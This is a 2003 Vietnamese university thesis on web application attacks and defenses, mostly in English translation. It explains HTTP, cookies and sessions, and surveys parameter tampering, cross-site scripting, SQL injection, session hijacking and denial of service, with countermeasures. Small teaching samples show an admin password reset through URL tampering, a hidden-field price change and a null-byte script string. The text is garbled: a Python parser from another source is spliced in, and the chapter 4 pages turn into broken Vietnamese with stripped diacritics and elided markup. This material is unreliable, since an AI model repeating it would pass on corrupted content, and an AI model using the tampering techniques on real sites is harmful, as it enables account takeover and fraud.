8/14/2019 LVCNTT-BaoMatWeb
1/169
MINISTRY OF EDUCATION AND TRAINING
UNIVERSITY OF NATURAL SCIENCES, HO CHI MINH CITY
FACULTY OF INFORMATION TECHNOLOGY
DEPARTMENT OF COMPUTER NETWORKS
GRADUATION THESIS
TOPIC:
RESEARCH ON SOME SECURITY ISSUES OF WEB APPLICATIONS ON THE INTERNET
Supervisor: MSc. Mai Van Cuong
Students: Nguyen Duy Thang - 9912074
Nguyen Minh Thu - 9912156
Course: 1999-2003
Acknowledgements
After nearly six months of effort, the thesis "Attack techniques and security of Web applications on the Internet" has been completed to some extent. Besides our own best efforts, we received a great deal of encouragement from the university, our teachers, our families and our friends.
First of all, we thank our parents, who always encouraged us and provided every condition for us to study and complete this graduation thesis.
We thank the teachers of the University of Natural Sciences for passing on valuable knowledge to us throughout our studies. In particular, we express our sincere and deep gratitude to Mr. Mai Van Cuong, who devotedly guided and helped us while we worked on this graduation thesis.
We thank all our friends who have encouraged and helped us during our studies and in completing this graduation thesis.
Remarks
TABLE OF CONTENTS
INTRODUCTION ........ 7
Organization of the thesis ........ 9
PART ONE: THEORETICAL FOUNDATIONS ........ 11
Chapter 1: Introduction to Web applications ........ 12
  I. THE CONCEPT OF A WEB APPLICATION ........ 13
  II. DESCRIPTION OF HOW A WEB APPLICATION OPERATES ........ 16
Chapter 2: Related concepts and terms ........ 18
  I. HACKER ........ 19
  II. HTTP HEADER ........ 19
  III. SESSION ........ 21
  IV. COOKIE ........ 22
  V. PROXY ........ 25
Chapter 3: Brief introduction to Web application attack techniques ........ 26
  I. WEB ACCESS CONTROL ........ 27
    I.1. Entering the system through a back door ........ 27
  II. SESSION MANAGEMENT ATTACKS ........ 27
    II.1. Session fixation ........ 27
    II.2. Session hijacking ........ 27
  III. EXPLOITING WEAKNESSES IN INPUT VALIDATION ........ 27
    III.1. Validating data with browser-side languages ........ 28
    III.2. Buffer overflow ........ 28
    III.3. URL encoding ........ 28
    III.4. Meta characters ........ 28
    III.5. Path traversal ........ 29
    III.6. Injecting code executed in the victim's browser ........ 29
    III.7. OS command injection ........ 29
    III.8. SQL injection ........ 30
    III.9. Server-side languages ........ 30
    III.10. Null characters ........ 30
    III.11. Manipulating passed parameters ........ 30
  IV. INFORMATION DISCLOSURE ........ 31
  V. DENIAL OF SERVICE ........ 31
PART TWO: WEB APPLICATION ATTACK TECHNIQUES AND SECURITY ........ 33
Chapter 4: Manipulating passed parameters ........ 34
  I. MANIPULATING THE URL ........ 35
    I.1. Concept ........ 35
    I.2. Some countermeasures ........ 36
  II. MANIPULATING HIDDEN FORM FIELDS ........ 36
    II.1. Concept ........ 36
    II.2. Some countermeasures ........ 38
  III. MANIPULATING COOKIES ........ 39
    III.1. Concept ........ 39
    III.2. Some countermeasures ........ 40
  IV. MANIPULATING THE HTTP HEADER ........ 41
    IV.1. Concept ........ 41
    IV.2. Some countermeasures ........ 42
Chapter 5: Injecting code executed in the victim's browser (Cross-Site Scripting) ........ 43
  I. THE CROSS-SITE SCRIPTING (XSS) ATTACK TECHNIQUE ........ 44
  II. THE TRADITIONAL XSS ATTACK METHOD ........ 46
  III. SOME WEBSITES FOUND TO HAVE XSS FLAWS ........ 50
  IV. XSS ATTACKS USING FLASH ........ 51
  V. COUNTERMEASURES ........ 54
Chapter 6: SQL Injection ........ 56
  I. THE CONCEPT OF SQL INJECTION ........ 57
  II. INTRODUCTION TO THE DATABASE MODEL ........ 57
  III. ATTACK METHODS ........ 58
    III.1. The SQL Injection attack technique ........ 58
    III.2. Attacks based on the SELECT statement ........ 60
    III.3. Attacks based on the HAVING clause ........ 62
    III.4. Attacks based on the UNION operator ........ 62
    III.5. Attacks based on the INSERT statement ........ 69
    III.6. Attacks based on STORED PROCEDUREs ........ 70
    III.7. Advanced ........ 70
      III.7.1. Strings without single quotes ........ 70
      III.7.2. Second-order attacks ........ 71
      III.7.3. Evading checks ........ 74
      III.7.4. Using Extended Stored Procedures ........ 75
        III.7.4.1. Using the Extended Stored Procedures built into SQL Server ........ 75
        III.7.4.2. Using self-made Extended Stored Procedures ........ 76
        III.7.4.3. Importing text files into tables ........ 77
  IV. COUNTERMEASURES ........ 77
    IV.1. Input validation ........ 78
    IV.2. SQL Server Lockdown ........ 81
Chapter 7: Session hijacking (Session Management) ........ 83
  I. OVERVIEW OF SESSION IDs ........ 84
  II. SESSION FIXATION ........ 85
    II.1. Attacking the Session ID in URL parameters ........ 88
    II.2. Attacking the Session ID in hidden form fields ........ 89
    II.3. Attacking the Session ID in cookies ........ 89
    II.4. Countermeasures ........ 91
  III. SESSION HIJACKING ........ 92
    III.1. Session ID prediction ........ 93
    III.2. Session ID brute force ........ 93
    III.3. Stealing the session using injected code ........ 94
    III.4. Countermeasures ........ 94
    III.5. The difference between session hijacking and session fixation ........ 94
Chapter 8: Buffer Overflow ........ 97
  I. CONCEPT ........ 98
  II. MEMORY ORGANIZATION ........ 99
    II.1. The stack ........ 100
    II.2. Push and pop ........ 101
    II.3. How functions work ........ 102
    II.4. Shell code ........ 104
  III. SOME WAYS TO CAUSE BUFFER OVERFLOWS THROUGH WEB APPLICATIONS ........ 106
  IV. COUNTERMEASURES ........ 106
Chapter 9: Denial of Service (DoS) ........ 108
  I. CONCEPT ........ 109
  II. WAYS A SYSTEM CAN BE ATTACKED BY DOS ........ 109
  III. ATTACK TECHNIQUES ........ 110
    III.1. The TCP three-way handshake ........ 110
    III.2. Exploiting TCP for the traditional SYN flood ........ 112
    III.3. Attacks on bandwidth ........ 113
      III.3.1. Attack type 1 ........ 113
      III.3.2. Attack type 2 ........ 113
    III.4. Attacks on system resources ........ 117
  IV. COUNTERMEASURES ........ 117
Chapter 10: Some other attack techniques ........ 119
  I. URL ENCODING ........ 120
    I.1. Concept ........ 120
    I.2. Some countermeasures ........ 121
  II. PATH TRAVERSAL ATTACKS ........ 121
    II.1. Concept ........ 121
    II.2. Some countermeasures ........ 122
  III. ATTACKS BASED ON NULL CHARACTERS ........ 123
    III.1. Concept ........ 123
    III.2. Some countermeasures ........ 123
  IV. SERVER-SIDE LANGUAGES ........ 123
    IV.1. Concept ........ 123
    IV.2. Attack method ........ 125
    IV.3. Countermeasures ........ 125
Chapter 11: Summary of a hacker's attack process ........ 127
  I. GATHERING INFORMATION ABOUT THE TARGET'S INFRASTRUCTURE ........ 128
  II. SURVEYING THE WEB APPLICATION ........ 131
  III. ATTACKING ........ 132
Chapter 12: Summary of countermeasures ........ 134
  I. FOR NETWORK ADMINISTRATORS ........ 135
  II. FOR WEB APPLICATION DESIGNERS ........ 137
  III. FOR WEB APPLICATION USERS ........ 139
PART THREE: THE WEB CHECKER PROGRAM ........ 140
Chapter 13: The Web Checker program ........ 141
  I. SPECIFICATION OF THE WEB CHECKER PROGRAM ........ 142
    I.1. Overview ........ 142
    I.2. Requirements ........ 142
      I.2.1. Functional requirements ........ 142
      I.2.1. Non-functional requirements ........ 143
  II. ARCHITECTURE OF THE WEB CHECKER PROGRAM ........ 143
    II.1. Architecture of the Web Checker program ........ 143
    II.2. Communication between the program and the Web server ........ 144
  III. IMPLEMENTATION ........ 145
    III.1. Implementation language ........ 145
    III.2. Implementation method ........ 145
      III.2.1. Using the Dialog-style interface model ........ 145
      III.2.2. Using an ActiveX Control (Microsoft Web Browser) ........ 145
      III.2.3. Using the Window Socket 2 programming interface ........ 146
      III.2.4. Some main classes and functions implemented in the program ........ 146
    III.3. Description of the program and how to use it ........ 151
      III.3.1. Program screens ........ 151
      III.3.2. How to use ........ 152
  IV. EVALUATION OF THE PROGRAM ........ 153
    IV.1. Achievements ........ 153
    IV.2. Limitations ........ 153
CONCLUSION ........ 155
  I. ACHIEVEMENTS ........ 156
  II. FUTURE DIRECTIONS ........ 157
APPENDIX ........ 158
INTRODUCTION

Today, with the Internet in widespread use, organizations and individuals alike want to publish information about themselves on the information highway and to carry out transactions online. The problem that arises is that as the scope of Web applications keeps widening, the likelihood of flaws appearing and of being attacked grows with it, and Web applications become targets for many attackers with different motives. Sometimes the motive is simply to test one's skill or to play a prank on someone else.

Along with the relentless growth of the Internet and of Internet services, the number of attacks on the Internet has also grown exponentially. While the mass media talk more and more about the information-access possibilities of the Internet, the technical literature has begun to discuss at length the problem of protecting and securing data on computers connected to the Internet.

According to figures from CERT (Computer Emergency Response Team), the number of Internet attacks reported to the organization was fewer than 200 in 1989, about 400 in 1991, 1400 in 1993, 2241 in 1994, and 5315 in 2001.

These attacks target every computer present on the Internet: the computers of large companies such as AT&T and IBM, of universities, government agencies, military organizations, banks, and so on. Some attacks were enormous in scale (up to 100,000 computers attacked). Moreover, these figures are only the tip of the iceberg. A very large share of attacks is never reported, for many reasons, among them fear of losing reputation, or simply because the system administrators are unaware that attacks are being aimed at their systems.

A typical case is the attack on IBM's commercial software in March 2001, in which two hackers found a flaw in the application that let anyone with a Web browser take over user accounts, even the administrator's.

Not only is the number of attacks rising rapidly, but attack methods are becoming ever more sophisticated and organized. On the other hand, administering network systems demands that the system administrator have solid knowledge and experience of network systems, so weak management creates many openings for hackers to exploit.

Also according to CERT, attacks in the 1988-1989 period consisted mainly of guessing user names and passwords (UserID/password) or using certain flaws in programs and operating systems (security holes) to disable protection; recent attacks, however, also include operations such as IP address spoofing, monitoring information sent over the network, taking over remote sessions (telnet or rlogin), and installing trojans or worms to monitor or control computers. The need to protect information on the Internet is therefore real, with the aims of protecting data, protecting user information and protecting the system.

When security is discussed, most security experts concentrate on the safety of the network system and the operating system. To protect a system, the method usually chosen is a firewall. However, according to CSI/FBI, 78% of victims used a firewall and 59% were attacked through the Internet; more specifically, according to the CSI/FBI Computer Crime and Security Survey, the total loss caused by attacks on Web applications from 1997 to 2000 was 626 million US dollars.

Automated vulnerability-scanning tools help Web programmers a great deal, but they still cannot stop everything, because Web technology is developing rapidly (with the emphasis mainly on appearance and speed), which leads to many new weaknesses. Attacks are not confined to the few techniques already discovered; they are flexible and multiply according to the mistakes of system administrators and application programmers.

This thesis was undertaken to study and analyze security flaws in Web applications (together with demonstration programs) and on that basis to propose remedies. In parallel, the thesis also implements a program that automatically detects flaws in Web applications, to help Web programmers gain experience in avoiding mistakes while building their applications.
Organization of the thesis

The thesis consists of 13 chapters divided into 3 parts:

Part one: THEORETICAL FOUNDATIONS
This part has 3 chapters:
+ Chapter 1: Introduction to Web applications
+ Chapter 2: Some related concepts and terms
+ Chapter 3: Overview of Web application attack techniques

Part two: ATTACK TECHNIQUES AND COUNTERMEASURES
This part has 9 chapters, chapters 4 to 12. The first 7 discuss attack techniques, and each ends with the countermeasures for that technique. Chapter 11 describes a hacker's attack process, and chapter 12 presents the most general countermeasures.

Part three: THE WEB CHECKER PROGRAM
This consists of the final chapter, which presents and explains the program.

The thesis closes with a conclusion that summarizes the issues presented and some directions for future development, followed by the list of references.
PART ONE
THEORETICAL FOUNDATIONS
Chapter 1
INTRODUCTION TO WEB APPLICATIONS
Contents:
I. The concept of a Web application
II. Description of how a Web application operates
CHAPTER 1: INTRODUCTION TO WEB APPLICATIONS

This thesis was undertaken to study the techniques used to attack Web sites and to propose countermeasures. The first chapter therefore briefly introduces some basic concepts, which form the foundation on which the later parts are built.

I. THE CONCEPT OF A WEB APPLICATION

A Web application is a client/server application that uses the HTTP protocol to interact with users or with other systems.

The client used by a person is usually a Web browser such as Internet Explorer or Netscape Navigator. It may also be a program acting as a user agent, operating like an automated browser. Users send and receive information from the server by interacting with Web pages. The programs may be online shops, forums, e-mail services and so on.

The techniques for building Web applications are also developing very fast. Earlier Web applications were usually built with CGI (Common Gateway Interface), ran on the Web server and could connect to simple databases on the same host. Today Web applications are usually written in Java (or similar languages), run on distributed servers and connect to many data sources.

A Web application usually has an architecture consisting of:

Figure 1.I-1. Architecture of a Web application

The presentation layer: this layer is responsible for displaying data to the user; it may also contain additional applications that create the layout of the Web page.

The application layer: this is where the Web application's processing happens. It processes the information the user requests, makes decisions and sends results to the presentation layer. This layer is usually implemented with programming techniques such as CGI, Java, .NET, PHP or ColdFusion, deployed on servers such as IBM WebSphere, WebLogic, Apache or IIS.

The data layer: usually a database management system (DBMS), responsible for managing the data files and access rights.

A model of how a Web application operates:

Figure 1.I-2. Operating model of a Web application

Where:
+ Client (also called the browser): Internet Explorer, Netscape Navigator, ...
+ Server: Apache, IIS, ...
+ Database management system: SQL Server, MySQL, DB2, Access.

In addition, a solution commonly used to protect a network system is the firewall. It acts as the outer barrier of a network system, since the main function of a firewall is to control the flow of information between computers. A firewall can be regarded as an information filter: it decides and enforces whether one computer may access another, or whether one network may access another.

Firewalls are usually used to:
+ Allow or deny services accessing the outside.
+ Allow or deny services from the outside accessing the inside.
+ Control the addresses that may connect, and block addresses.

A firewall operates on IP packets and therefore controls access by the user's machine.

II. DESCRIPTION OF HOW A WEB APPLICATION OPERATES

First the browser sends a request to the Web server through the basic HTTP commands GET, POST and so on. The server may then run a program built in any of several languages such as Perl or C/C++, or ask an interpreter to execute ASP, JSP or similar pages as the client requested.

Depending on the tasks the installed program performs, it processes, computes, connects to the database, stores the information the client sent, and so on, and then returns to the client a data stream formatted according to the HTTP protocol. This stream has 2 parts:

+ The header describes the data packet and the attributes and state of the exchange between the browser and the Web server.
+ The body is the data content the server sends to the client; it can be an HTML file, an image, a video clip or any document.

In the model of figure 1.I-2, the firewall treats the flow of information between server and client as legitimate. Therefore, if a hacker finds a flaw in the Web application, the firewall is no longer of any use in stopping that hacker. As a result, attacks on network systems today increasingly concentrate on oversights (or flaws) made by Web developers while building the application rather than on direct attacks on the network or the operating system. A hacker can also use Web flaws to extend the attack to other, unrelated systems.
Chapter 2
RELATED CONCEPTS AND TERMS
Contents:
I. Hacker
II. HTTP Header
III. Session
IV. Cookie
V. Proxy
CHAPTER 2: RELATED CONCEPTS AND TERMS

I. HACKER

Hacker is a term used specifically for those who break into network systems. Hackers are usually computer experts. Hackers do not create the holes in a system, but they are people with a thorough understanding of operating systems, database management systems, programming languages and so on. They use this knowledge to search for and exploit the flaws of network systems. Some hackers stop at discovering flaws and reporting them to security specialists or to the program's developers; they are regarded as WhiteHats. Other hackers use the flaws to carry out unauthorized exploitation for the purpose of sabotage or personal gain; these are regarded as BlackHats.

Because the term hacker is so widespread, this thesis uses "hacker" in place of "attacker" throughout.

II. HTTP HEADER

The HTTP header is the leading part (header) of the information that the client and the server send to each other. Information sent by the client to the server is called an HTTP request, and information sent by the server to the client is an HTTP response. Usually an HTTP header consists of several lines, each containing a parameter name and a value. Some parameters can be used in both request and response headers, while others are specific to one of the two. For example:

Request header:
GET /tintuc/homnay.asp HTTP/1.1
Accept: */*
Accept-Language: en-us
Connection: Keep-Alive
Host: localhost
Referer: http://localhost/lienket.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Accept-Encoding: gzip, deflate

o The first line is the request line; it gives the request method (GET or POST), the requested address (/tintuc/homnay.asp) and the HTTP version (HTTP/1.1).
o Next come the parameters. For instance: Accept-Language gives the language used in the Web page; Host gives the address of the server; Referer gives the address of the referring Web page.
o The header of an HTTP request ends with an empty line.

Response header:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 13 Jul 2000 05:46:53 GMT
Content-Length: 2291
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQGGGNCG=LKLDFFKCINFLDMFHCBCBMFLJ; path=/
Cache-control: private
...

o The first line is the status line; it gives the HTTP version used (HTTP/1.1), the status code (200) and the status (OK).
o Next come the parameters.
o Next is an empty line signalling the end of the header, followed by the body of the HTTP response.

The list of HTTP header parameters is presented in Appendix A.
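As an added example (not from the thesis or its Web Checker program), a small parser for the two messages shown above: it splits the head from the body at the empty line the text describes, separates the request line from the status line, and breaks the Set-Cookie line into the cookie pair and its attributes. The sample messages are the ones quoted above reassembled with CRLF line endings; the short HTML body appended to the response is constructed.

```python
from typing import Dict, List, Tuple

# Constructed sample messages: the request and response heads quoted in this
# section, with CRLF line endings. The Set-Cookie header is on one line, as a
# server sends it, and a short body is appended so the head/body split shows.
REQUEST_HEAD = (
    "GET /tintuc/homnay.asp HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-us\r\n"
    "Connection: Keep-Alive\r\n"
    "Host: localhost\r\n"
    "Referer: http://localhost/lienket.asp\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "\r\n"
)
RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Date: Thu, 13 Jul 2000 05:46:53 GMT\r\n"
    "Content-Length: 2291\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: ASPSESSIONIDQQGGGNCG=LKLDFFKCINFLDMFHCBCBMFLJ; path=/\r\n"
    "Cache-control: private\r\n"
    "\r\n"
    "<html>...</html>"
)


def split_message(raw: str) -> Tuple[List[str], Dict[str, List[str]], str]:
    """Return (start-line fields, headers, body) for one HTTP message.
    The head ends at the first empty line; header names are case-insensitive,
    so they are stored lower-cased, and a repeated header keeps every value."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        raise ValueError("header block not terminated by an empty line")
    lines = head.split("\r\n")
    start = lines[0].split(" ", 2)
    if len(start) != 3:
        raise ValueError("malformed start line: %r" % lines[0])
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        # Reject a missing colon and whitespace before the colon; both are the
        # kind of malformed line that different parsers read differently.
        if not colon or not name or name != name.strip():
            raise ValueError("malformed header line: %r" % line)
        headers.setdefault(name.lower(), []).append(value.strip())
    return start, headers, body


def parse_request(raw: str) -> dict:
    """Request line: method, requested address, HTTP version."""
    (method, target, version), headers, body = split_message(raw)
    if not version.startswith("HTTP/"):
        raise ValueError("request line does not end with an HTTP version")
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def parse_response(raw: str) -> dict:
    """Status line: HTTP version, numeric status code, status text."""
    (version, code, reason), headers, body = split_message(raw)
    if not (version.startswith("HTTP/") and code.isdigit()):
        raise ValueError("malformed status line")
    return {"version": version, "status": int(code), "reason": reason,
            "headers": headers, "body": body}


def parse_set_cookie(value: str) -> Tuple[str, str, Dict[str, str]]:
    """Split 'name=value; attr=val; ...' into the cookie pair and its attributes."""
    first, *rest = [part.strip() for part in value.split(";")]
    name, _, val = first.partition("=")
    attrs: Dict[str, str] = {}
    for item in rest:
        if item:
            key, _, attr_val = item.partition("=")
            attrs[key.strip().lower()] = attr_val.strip()
    return name, val, attrs
```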
III. SESSION

HTTP is a generic, stateless object-oriented protocol, meaning that HTTP does not store the working state between the browser and the server. This shortcoming makes some Web applications difficult to build, because the server cannot know what state the browser was in before. To solve this problem, Web applications introduce the concept of a session. A SessionID is a string that authenticates the session. Some servers give the user a SessionID when the user views a page on the server.

To maintain the session, the sessionID is usually stored in:
+ A URL variable
+ A hidden form field
+ A cookie

A session exists only for a permitted period of time, configured on the server or set by the running application. The server automatically releases the session to recover system resources.
IV. COOKIE

Cookies are small structured pieces of data shared between the server and the user's browser.

Cookies are stored as small text data files created by the application to store, retrieve and recognize information about users who have visited the Web site and the areas they went through on the site. This information can include the user's name/identifier, password, preferences, habits, and so on. The cookie is accepted by the user's browser and stored on the hard disk of the user's machine; however, a browser does not always support cookies, and it also depends on whether the user accepts having them stored.

On later visits to that Web site, the application can reuse the information in the cookie (such as the login information for Yahoo! Messenger) so that the user does not have to log in again or provide the other information again.

Cookies are classified along 2 axes, secure/non-secure and persistent/non-persistent, so there are 4 kinds of cookie:
+ Persistent and Secure
+ Persistent and Non-Secure
+ Non-Persistent and Secure
+ Non-Persistent and Non-Secure

Persistent cookies are stored as .txt files on the client machine for a fixed period of time (for example, Netscape Navigator stores its cookies in a single file cookie.txt, while Internet Explorer stores them in many *.txt files, one file per cookie).

Non-persistent cookies are stored in the client machine's RAM and are destroyed when the Web page is closed or when the Web page sends a deletion command.

Secure cookies can only be sent over HTTPS (SSL).

Non-secure cookies can be sent over either protocol, HTTPS or HTTP. In practice, for a secure cookie the server provides a protected transmission mode.

The components of a cookie are:

Domain | Flag | Path | Secure | Expiration | Name | Value
www.redhat.com | FALSE | / | FALSE | 1154029490 | Apache | 64.3.40.151.16018996349247480

Domain: the domain name of the Web site that created the cookie (www.redhat.com in the example above).

Flag: TRUE/FALSE. Determines whether other hosts within the same domain may access the cookie.

Path: the range of addresses that may access the cookie. For example, if the path is /tracuu then the addresses in the /tracuu directory and in all its subdirectories, such as /tracuu/baomat, may access this cookie. If the value is / then the cookie may be accessed by every address in the domain of the Web site that created it.

Secure: TRUE/FALSE. Determines whether this is a secure cookie, that is, whether the connection uses SSL.

Expiration: the cookie's expiry time, counted in seconds from 00:00:00 GMT on 01/01/1970. If this value is not set, the browser treats the cookie as non-persistent: it is kept only in RAM and deleted when the browser is closed.

Name: the variable name (Apache in this case).

Value: for the cookie created above, the value of Apache is 64.3.40.151.16018996349247480, expiring on 27/07/2006, for the domain http://www.redhat.com.

For example, the following command string in an HTTP header creates a cookie:
Set-Cookie:Apache="64.3.40.151.16018996349247480"; path="/"; domain="www.redhat.com"; path_spec; expires="2006-07-27 19:39:15Z"; version=0

Netscape (NS) cookies are placed in a single file Cookies.txt, at the path C:\Program Files\Netscape\Users\UserName\Cookies.txt

IE cookies are stored as many files, one cookie per file, placed in [C:]\Documents and Setting\[username]\Cookies (Win2000); on Win9x the cookies directory is [C:]\Windows\cookies.

The maximum size of a cookie is 4kb. The maximum number of cookies for one domain is 20. A cookie that is destroyed as soon as the browser is closed is called a session cookie.
V. PROXY

A proxy gives users Internet access for a particular protocol, or a set of protocols, running on a dual-homed host or a bastion host. The user's client programs go through the proxy server as an intermediary in place of the real server the user needs to communicate with.

The proxy server examines the requests from the client and decides whether or not to serve them. If a request is served, the proxy server connects to the real server on the client's behalf and goes on relaying the client's requests to the server and the server's replies to the client. The proxy server is therefore like a bridge between server and client.
Chapter 3
BRIEF INTRODUCTION TO WEB APPLICATION ATTACK TECHNIQUES
Contents:
I. Web access control
II. Session management attacks
III. Exploiting weaknesses in input validation
IV. Information disclosure
V. Denial of service
CHAPTER 3: BRIEF INTRODUCTION TO WEB APPLICATION ATTACK TECHNIQUES

The following are brief descriptions of the Web application attack techniques, classified by the degree of harm they cause the application.

I. WEB ACCESS CONTROL

I.1. Entering the system through a back door

While designing an application, its developers may install a back door so that they can later enter the system easily.

II. SESSION MANAGEMENT ATTACKS

II.1. Session fixation

An attack technique that lets a hacker impersonate a legitimate user by sending a valid session ID to the user; once the user has logged in to the system successfully, the hacker reuses that session ID and automatically becomes the legitimate user.

II.2. Session hijacking

An attack technique that lets a hacker impersonate a legitimate user after the victim has logged in to the system, by decoding the victim's session ID stored in a cookie, a URL parameter or a hidden form field.

III. EXPLOITING WEAKNESSES IN INPUT VALIDATION

The hacker uses the data-entry fields to send arbitrary code that makes the system execute it or breaks the system entirely.

III.1. Validating data with browser-side languages (client-side validation)

Because browser-side languages (JavaScript, VBScript, etc.) run in the browser, the hacker can modify the source code to disable the check.

III.2. Buffer overflow

A volume of data is sent to the application that exceeds the space allocated for it, so that the application cannot execute its intended next instruction and instead executes arbitrary code the hacker has placed in the system. This is more serious if the application is configured to run with root privileges on the system.

III.3. URL encoding

Taking advantage of the standard encoding of special characters in URLs, the hacker automatically encodes the illegal characters, those checked by the scripting language, to get past that check.

III.4. Meta characters

Using special characters (described in more detail in the appendix), the hacker can insert into the submitted data characters that form part of a command string, such as the tag used in the XSS technique, or -- in SQL, in order to execute commands.

III.5. Path traversal

A method that exploits the path used to access a file in the URL, which returns the result to the browser, so that the hacker can obtain the contents of any file on the system.

III.6. Injecting code executed in the victim's browser (Cross-Site Scripting)

This is an attack technique aimed mainly at information on the user's computer rather than at the server. By adding arbitrary code (usually written in a scripting language such as JavaScript or VBScript), the hacker can steal important information such as cookies and, using the stolen information, become a legitimate user of the application. Cross-site scripting is also a form of session hijacking.

III.7. OS command injection

The ability to execute system commands or code inserted into parameters that are not strictly checked, such as form parameters, cookies, HTTP request headers, and dangerous data in files uploaded to the server.

Success with this technique lets the hacker execute system commands with the same privileges as the server.

III.8. SQL injection

In database programming, the programmer has made mistakes in checking the input values, which the hacker exploits to insert queries or invalid values and so log in to the system easily.

III.9. Server-side languages (server side includes)

The ability to insert system-level commands such as including files (include file) or accessing the database (jdbc), which gives the hacker the opportunity to access files, databases and other resources that normally cannot be viewed on the Web site.

III.10. Null characters

This exploits the fact that character strings usually end with \0; the hacker inserts \0 to deceive the application, because for applications that use CGI programs written in C++, C++ treats \0 as the end of the string.

Example: the hacker submits the following string:
input: ti th nht\0 alert(document.cookie)
If the application uses a C++ program to validate the string, the string above is accepted as valid, because C++ recognizes \0 as the end of the string and does not check the part after it.

III.11. Manipulating passed parameters (parameter manipulation)

The information exchanged between the server and the browser is stored in variables such as URL variables, hidden form fields and cookies. Because checking these variables has not received enough attention, the hacker can modify their values to steal a user's session or to change the price of an item.

IV. INFORMATION DISCLOSURE

Files and applications on the system that contain important information, such as the source code of a Web page or the file holding users' passwords, are always targets for hackers. Comments in the source code are also a useful source of information for the hacker.

The hacker uses the system's HTTP responses to determine whether a file or application exists.

Example 1.IV-1:
HTTP 200: the file exists
HTTP 404: the file does not exist

V. DENIAL OF SERVICE (DoS)

A large number of requests is sent to the application within a fixed period of time, so that the system cannot keep up with the requests and collapses.

Because the scope and time of the thesis are limited, the thesis studies only a number of common techniques with a high potential for damaging a network system. In the chapters of part two, the thesis presents the concept of each of the following techniques:
+ Manipulating passed parameters
+ Injecting code executed in the browser
+ SQL injection
+ Session hijacking
+ Buffer overflow
+ Denial of service
+ Some other techniques
o Null characters
o URL encoding
o Exploiting path access to a file
o Server-side languages
PART TWO
WEB APPLICATION ATTACK TECHNIQUES AND SECURITY
Chapter 4
MANIPULATING PASSED PARAMETERS
Contents:
I. Manipulating the URL
II. Manipulating hidden form fields
III. Manipulating cookies
IV. Manipulating the HTTP header
8/14/2019 LVCNTT-BaoMatWeb
38/169
Khoa CNTT
Chng 4: Thao tc trn tham struyn
-Trang 35-
CHNG 4:THAO TC TRN THAM S TRUYN
Thao tc trn tham s truyn l kthut thay i thng tin quan trng trn cookie, URL
hay bin n ca form. Kthut Cross-Site Scripting, SessionID, SQL Injection, Buffer
Overflowcng cn dng n cc tham s ny hon thin cc bc tn cng ca
hacker. C th ni cc tham s truyn l u mi cho mi hot ng ca hacker trong
qu trnh tn cng ng dng. V thy l ni dung chng u tin c cp trong
phn th hai, mc ch cng l h trtt hn phn trnh by cc chng k tip.
I. THAO TC TRN URL
I.1. Khi nim:
Khi nhp mt form HTML th kt qu sc gi i theo hai cch: GET hay
POST. Nu dng GET, th tt c cc tn bin v gi tr ca n s xut hin trong
chui URL.
V d 4.I.1-1: C mt trang web ng dng cho php thnh vin c thay i
mt khu.
http://www.nganhang.com/example?user=thang&newpass=123
Vi:
+ username l tn ngi cn thay i mt khu.
+ newpass l mt khu mi cho username
Tuy nhin, bng cch thay i tham s nh sau:
8/14/2019 LVCNTT-BaoMatWeb
39/169
Khoa CNTT
Chng 4: Thao tc trn tham struyn
-Trang 36-
http://www.nganhang.com/example?user=admin&newpass=111111
Hacker c th thay i mt khu ca admin bng mt mt khu mi bt k,
trong v d ny l 1111111
I.2. Mt s bin php khc phc
chng li kiu thay i ni dung mt chui URL, ng dng c th p dng
bin php sau:
ng dng s dng cch bng bm (hash table). Sau khi ngi dng chng
thc thnh cng vi mt username , ng dng s sinh ra mt kho tng ng.
Kho ny s c lu trn server cng vi bin username trong i tng
bng bm. Mi khi ngi dng kt ni n ng dng, kho v username ny
sc gi i v c so snh vi kho v username trong bng bm. Nu
tng ng vi bn ghi trong d liu th hp l. Cn nu khng th server bit
rng ngi dng thay i URL.
Ngoi ra, vi nhng thng tin c gi tr, cn m ho thng tin ny trc khi
cho hin th trn trnh duyt trnh hacker c th sa i ty .
II. THAO TC TRN BIN N FORM
II.1. Khi nim
Thng tin c thc chuyn i thng qua mt bin n ca form, gi l Hidden
Form Field. Bin n form khng hin th trn mn hnh trnh duyt nhng ngi
dng c th tm thy ni dung ca n trong view source , v thy l mt
im yu hacker li dng bng cch lu ni dung trang web xung trnh duyt,
thay i ni dung trang v gi n trnh ch.
8/14/2019 LVCNTT-BaoMatWeb
40/169
Khoa CNTT
Chng 4: Thao tc trn tham struyn
-Trang 37-
V d 4.II.1-1: Form gc c ni dung nh sau:
...
...
Nu khng c s thay i no th yu cu n trnh ch c ni dung :
POST /cuahang.pl HTTP/1.0
...
giaca=99.99
Nhng nu hacker gn mt gi tr khc cho trng giaca :
...
...
th yu cu s thay i:
POST /cuahang.pl HTTP/1.0
...
giaca=0.99
Ngoi vic thay i ni dung bin n ca form, hacker cn bin i ni dung cc
thnh phn trong form, nh chiu di ca mt nhp d liu thc hin vic tn
cng BUFFER OVERFLOW,
8/14/2019 LVCNTT-BaoMatWeb
41/169
Khoa CNTT
Chng 4: Thao tc trn tham struyn
-Trang 38-
II.2. Some countermeasures
Use hidden form fields only to display data in the browser; never use the value of such a field in the application's processing logic.
Use the HTTP_REFERER variable to check the origin of an incoming request. However, a hacker can use a proxy to hide the true origin, so HTTP_REFERER should not be relied on too much as a check either.
Concatenate the name and value of the hidden field into a single string. Use the MD5 algorithm or another one-way hash to digest that string, and store the result in a hidden field called the "reference string".
When the form values are submitted, the same operations are performed again with the same secret key that we chose in advance. The result is then compared with the reference string; if they do not match, the value in the form has been altered.
Use a sessionID that refers to information stored in the database.
III. MANIPULATING COOKIES
III.1. Concept
In part one, chapter 2, section IV, the thesis presented the basic concept of a cookie. This section only presents how a cookie can be altered.
